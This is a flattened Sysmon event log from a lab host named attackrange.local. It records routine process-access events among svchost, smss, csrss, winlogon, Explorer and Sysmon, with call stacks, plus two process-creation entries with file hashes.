12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291795Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291794Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291793Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291792Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291791Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291790Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291789Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-0289-6088-042A-00000000BB01}6404C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000291788Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000291787Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000291786Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-0289-6088-032A-00000000BB01}67204016C:\Windows\System32\smss.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000291785Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.977{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e73SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{BEA10069-0289-6088-032A-00000000BB01}6720C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000010c 0000007c 10341000x8000000000000000291784Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.975{BEA10069-D0B7-6086-0200-00000000BB01}324840C:\Windows\System32\smss.exe{BEA10069-0289-6088-042A-00000000BB01}6404C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291783Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-042A-00000000BB01}6404C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291782Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-1500-00000000BB01}11041328C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291781Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291780Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291779Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291778Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291777Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291776Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291775Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291774Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291773Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291772Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.960{BEA10069-0289-6088-032A-00000000BB01}67204016C:\Windows\System32\smss.exe{BEA10069-0289-6088-042A-00000000BB01}6404C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000291771Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.961{BEA10069-0289-6088-042A-00000000BB01}6404C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e73SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{BEA10069-0289-6088-032A-00000000BB01}6720C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000010c 0000007c 10341000x8000000000000000291770Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 